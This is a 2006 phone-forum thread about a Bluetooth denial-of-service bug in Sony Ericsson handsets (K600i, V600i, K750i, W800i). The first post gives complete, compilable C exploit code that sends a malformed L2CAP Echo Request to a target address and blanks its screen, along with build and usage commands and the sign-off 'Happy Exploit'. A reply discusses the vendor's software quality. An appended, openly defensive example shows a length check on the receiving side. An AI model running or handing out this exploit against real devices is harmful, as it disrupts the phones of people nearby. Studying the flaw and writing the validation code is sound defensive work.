02-10-2006, 13:04 | #1 (permalink) |
No Life Poster Join Date: Dec 2004 Location: 0x001FD00
Posts: 1,285
Member: 98572 Status: Offline Thanks Meter: 36 |
SEMC BlueTooth Exploit, K600i, V600i, K750i, W800i and maybe other ones

/* Pierre BETOUIN - [email protected]                        */
/* 05-02-2006                                              */
/* Vulnerability found using BSS fuzzer :                  */
/* Download www.secuobs.com/news/05022006-bluetooth10.shml */
/*                                                         */
/* Causes abnormal behaviours on some Sony/Ericsson        */
/* cell phones                                             */
/* Vulnerable tested devices :                             */
/* - K600i                                                 */
/* - V600i                                                 */
/* - K750i                                                 */
/* - W800i                                                 */
/* - And maybe other ones...                               */
/*                                                         */
/* Vulnerable devices will slowly turn their screen into   */
/* black and then display a white screen.                  */
/* After a short period (~45sec), they will go back to     */
/* their normal behaviour                                  */
/*                                                         */
/* gcc -lbluetooth reset_display_sonyericsson.c            */
/*     -o reset_display_sonyericsson                       */
/* ./reset_display_sonyericsson 00:12:EE:XX:XX:XX          */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* memset */
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <bluetooth/bluetooth.h>
#include <bluetooth/hci.h>
#include <bluetooth/l2cap.h>

#define SIZE 4
#define FAKE_SIZE 1 // SIZE - 3 (3 bytes <=> L2CAP header)

int main(int argc, char **argv)
{
    char *buffer;
    l2cap_cmd_hdr *cmd;
    struct sockaddr_l2 addr;
    int sock, sent, i;

    if(argc < 2)
    {
        fprintf(stderr, "%s <btaddr>\n", argv[0]);
        exit(EXIT_FAILURE);
    }

    if ((sock = socket(PF_BLUETOOTH, SOCK_RAW, BTPROTO_L2CAP)) < 0)
    {
        perror("socket");
        exit(EXIT_FAILURE);
    }

    memset(&addr, 0, sizeof(addr));
    addr.l2_family = AF_BLUETOOTH;

    if (bind(sock, (struct sockaddr *) &addr, sizeof(addr)) < 0)
    {
        perror("bind");
        exit(EXIT_FAILURE);
    }

    str2ba(argv[1], &addr.l2_bdaddr);

    if (connect(sock, (struct sockaddr *) &addr, sizeof(addr)) < 0)
    {
        perror("connect");
        exit(EXIT_FAILURE);
    }

    if(!(buffer = (char *) malloc ((int) SIZE + 1)))
    {
        perror("malloc");
        exit(EXIT_FAILURE);
    }

    memset(buffer, 90, SIZE);
    cmd = (l2cap_cmd_hdr *) buffer;
    cmd->code = L2CAP_ECHO_REQ;
    cmd->ident = 1;
    cmd->len = FAKE_SIZE;

    if( (sent=send(sock, buffer, SIZE, 0)) >= 0)
    {
        printf("L2CAP packet sent (%d)\n", sent);
    }

    printf("Buffer:\t");
    for(i=0; i<sent; i++)
        printf("%.2X ", (unsigned char) buffer[i]);
    printf("\n");

    free(buffer);
    close(sock);
    return EXIT_SUCCESS;
}

/* Happy Exploit... */
02-10-2006, 15:10 | #2 (permalink) |
No Life Poster Join Date: Nov 2001 Location: England Age: 41
Posts: 2,821
Member: 7653 Status: Offline Thanks Meter: 823 |
So it looks like sending any command to these phones with an incorrect packet size will cause this malfunction? From using a Sony Ericsson K750, then W800, then W550, and seeing how "unpolished" the software is, I am not surprised by this. And I think there will be other, more malicious bugs in the software...
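The packet built in post #1 declares a command length of 1 (FAKE_SIZE) while sending only the 4-byte command header with no data behind it. As an added example, not part of this thread and not vendor code, here is a receiver-side check that walks an L2CAP signalling payload and rejects any command whose declared length does not fit the bytes received; the function, enum and sample names are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Hypothetical result codes for this example. */
enum sig_check { SIG_OK = 0, SIG_SHORT_HEADER = 1, SIG_LEN_MISMATCH = 2 };

#define SIG_HDR_LEN 4 /* code (1) + ident (1) + length (2, little-endian) */

/* Validate every command in one signalling payload of n bytes.
 * Returns the first problem found, or SIG_OK if all commands fit exactly. */
enum sig_check check_signalling(const uint8_t *buf, size_t n)
{
    size_t off = 0;

    if (n == 0)
        return SIG_SHORT_HEADER;
    while (off < n) {
        if (n - off < SIG_HDR_LEN)          /* not even a full header left */
            return SIG_SHORT_HEADER;
        size_t declared = (size_t)buf[off + 2] | ((size_t)buf[off + 3] << 8);
        size_t avail = n - off - SIG_HDR_LEN;
        if (declared > avail)               /* header claims more data than arrived */
            return SIG_LEN_MISMATCH;
        off += SIG_HDR_LEN + declared;      /* next command in the same payload */
    }
    return SIG_OK;
}

/* Constructed samples. sample_poc matches the bytes the posted code builds:
 * Echo Request (0x08), ident 1, length 1, and no data. */
static const uint8_t sample_poc[]   = {0x08, 0x01, 0x01, 0x00};
static const uint8_t sample_ok[]    = {0x08, 0x01, 0x01, 0x00, 0x5A};
static const uint8_t sample_two[]   = {0x08, 0x01, 0x00, 0x00,
                                       0x08, 0x02, 0x02, 0x00, 0x41, 0x42};
static const uint8_t sample_trunc[] = {0x08, 0x01, 0x01};

int main(void)
{
    printf("poc:   %d\n", check_signalling(sample_poc, sizeof sample_poc));
    printf("ok:    %d\n", check_signalling(sample_ok, sizeof sample_ok));
    printf("two:   %d\n", check_signalling(sample_two, sizeof sample_two));
    printf("trunc: %d\n", check_signalling(sample_trunc, sizeof sample_trunc));
    return 0;
}
```

A stack that runs this kind of check before dispatching on the command code can answer a mismatched packet with a rejection instead of reading past the received data.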